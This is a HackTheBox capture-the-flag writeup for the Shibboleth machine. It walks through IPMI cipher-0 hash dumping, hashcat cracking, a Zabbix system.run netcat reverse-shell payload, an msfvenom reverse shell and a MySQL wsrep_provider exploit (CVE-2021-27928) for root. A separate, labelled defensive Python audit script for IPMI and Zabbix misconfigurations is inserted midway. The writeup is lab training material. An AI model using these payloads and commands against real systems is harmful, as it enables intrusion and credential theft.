Shibboleth writeup | HackTheBox

Karim Reda
6 min read · Apr 2, 2022


Hello Friends,

Happy Ramadan to all.

Today we will go on an awesome journey to solve this great machine at HTB.

First of all, we will do an nmap scan to see which open ports will help us in our attack.

Here, I found one open port for a website. Then I will add shibboleth.htb to my /etc/hosts file.

When I visit the website, I don't find anything useful.

Now I will search for interesting endpoints or directories using the gobuster tool.

I found 2 directories, but when I go to them, I don't find anything useful either.

Now I got an idea: I will search for interesting subdomains using the wfuzz tool.

I found 3 interesting subdomains, but one of them looks like a service or something like that.

I will go to "zabbix.shibboleth.htb" and find the login form.

I will go to the help page to find the documentation and search for any useful information.

Wow, we know that Zabbix is version 5.0.

Now we will use Google to find any public exploit for this service.

I find that it is vulnerable to SQL injection and XSS: https://packetstormsecurity.com/files/163657/Zabbix-5.x-SQL-Injection-Cross-Site-Scripting.html

and it is vulnerable to authenticated RCE: https://www.exploit-db.com/exploits/50816

but I didn't do anything with this information.

Now I realized that I missed something: what if there is another open port?

Now I will retry the nmap scan to search for open UDP ports.

Indeed, we found port 623 open, but this service name is strange to me.

After some searching, I found this great article: https://book.hacktricks.xyz/pentesting/623-udp-ipmi, which explains everything about this port and how to exploit it.

The first thing we will do with msfconsole is find out the IPMI version.

Now we found that the IPMI version is 2.0.

After some searching I realized that this version gives us the ability to bypass IPMI authentication via cipher 0.

But we need to have a valid user first.

Now we succeeded in finding a valid user named administrator.

You should install ipmitool on your local machine before continuing with the rest of the steps, using this command:

apt-get install ipmitool

Use the following command to dump the list of users using cipher 0:

ipmitool -I lanplus -C 0 -H 10.10.11.124 -U Administrator -P root user list

Now repeat the last step to dump the hashes again from the msf module.

Save the hash to a text file on your local machine, then use this hashcat command to crack the hash:

hashcat -m 7300 hashes.txt /usr/share/wordlists/rockyou.txt --force

Now we have a user and password; what should I do with them?

Remember that you reached the login form of Zabbix before.

Try to log in. Yeah, it is correct, and we have succeeded in logging in to the dashboard.

Now we want to get initial access to the system from this dashboard.

After googling, I found this link, which helped me learn more about the environment of the Zabbix dashboard: https://stackoverflow.com/questions/24222086/how-to-run-command-on-zabbix-agents

I will go forward with the steps in the above thread to get initial access.

We should create a new item and follow the rest of the steps.

We created a new item and added the reverse shell payload in the key input field, as in the steps in the article.

After adding it, we can execute it.

I succeeded in getting a shell, but the shell is not stable.

After some searching in the Zabbix documentation, I found that I should add the "nowait" argument to our reverse shell payload to get a stable command shell.

The final payload is: system.run[rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <yourIP> <Port> >/tmp/f, nowait]

Yes, we did it; we managed to get a stable shell now.

The first thing now: we want to get another user to get the first flag, the "user flag".
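As an added defender's check (not part of the original writeup), here is a small Python audit for the two misconfigurations the foothold relied on: IPMI cipher suite 0 left enabled, as reported by `ipmitool lan print`, and a Zabbix agent configured to execute `system.run[]` items. The `ipmitool` output and the `zabbix_agentd.conf` fragment are constructed samples, and the meaning of `EnableRemoteCommands`/`AllowKey` is my understanding of the Zabbix 5.0 agent configuration, so treat that as an assumption.

```python
import re

# Constructed sample of `ipmitool lan print 1` output (only the cipher
# lines matter; a real BMC prints many more fields).
SAMPLE_LAN_PRINT = """\
IP Address Source       : Static Address
IP Address              : 10.10.11.124
RMCP+ Cipher Suites     : 0,1,2,3,6,7,8,11,12
Cipher Suite Priv Max   : aaaaXXaaaXXaaXX
                        :     X=Cipher Suite Unused
                        :     c=CALLBACK
"""

# Constructed zabbix_agentd.conf fragment from a hypothetical host.
SAMPLE_AGENT_CONF = """\
Server=10.10.11.124
EnableRemoteCommands=1
AllowKey=system.run[*]
"""


def cipher0_enabled(lan_print: str) -> bool:
    """True when cipher suite 0 (no authentication) is usable.

    Character 0 of 'Cipher Suite Priv Max' is cipher suite 0: 'X' means
    unused, any other letter is the privilege level a cipher-0 session gets.
    """
    m = re.search(r"Cipher Suite Priv Max\s*:\s*(\S+)", lan_print)
    if not m:
        raise ValueError("no 'Cipher Suite Priv Max' line found")
    return m.group(1)[0] != "X"


def agent_allows_system_run(conf: str) -> list:
    """Return the config lines that let the agent execute system.run[] items.

    Assumption: EnableRemoteCommands=1 (deprecated in 5.0) or an AllowKey
    matching system.run is what permits remote command execution.
    """
    findings = []
    for raw in conf.splitlines():
        line = raw.strip()
        if line.startswith("#") or "=" not in line:
            continue
        key, _, value = line.partition("=")
        key, value = key.strip(), value.strip()
        if key == "EnableRemoteCommands" and value == "1":
            findings.append(line)
        elif key == "AllowKey" and value.startswith("system.run"):
            findings.append(line)
    return findings


if __name__ == "__main__":
    print("IPMI cipher 0 enabled:", cipher0_enabled(SAMPLE_LAN_PRINT))
    print("Zabbix agent remote-command lines:", agent_allows_system_run(SAMPLE_AGENT_CONF))
```

On a BMC where the first check returns True, the usual fix is `ipmitool lan set <channel> cipher_privs XaaaXXaaaXXaaXX`; on the agent side, remove the flagged lines or replace them with a `DenyKey=system.run[*]`.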

Getting Root

The first thing I do when I try to escalate my privileges is run this command:

sudo -l

to see all sudo commands that I can run.

The user can't run any sudo command.

Then we will run:

find / -group ipmi-svc 2>/dev/null

to get all things that we have access to.

I saw a file that may be interesting for me, named /etc/zabbix/zabbix_server.conf.

Let's read it.

While reading the config file, we find the DB creds.

We will try to connect to MySQL using these creds.

We managed to connect correctly.

I noticed the DB version; I will search for a public exploit for it.

I think this link will be useful in this phase: https://github.com/Al1ex/CVE-2021-27928

First, I will generate my payload using:

msfvenom -p linux/x64/shell_reverse_tcp LHOST=<IP> LPORT=<port> -f elf-so -o CVE-2021-27928.so

Transfer the exploit file to the victim machine.

Reconnect to the database with the creds and run this query: SET GLOBAL wsrep_provider="path_to_exploit";

Wow, I don't believe it; I rooted this extreme machine.

Thanks for reading❤

Follow me on LinkedIn: Karim Reda | LinkedIn
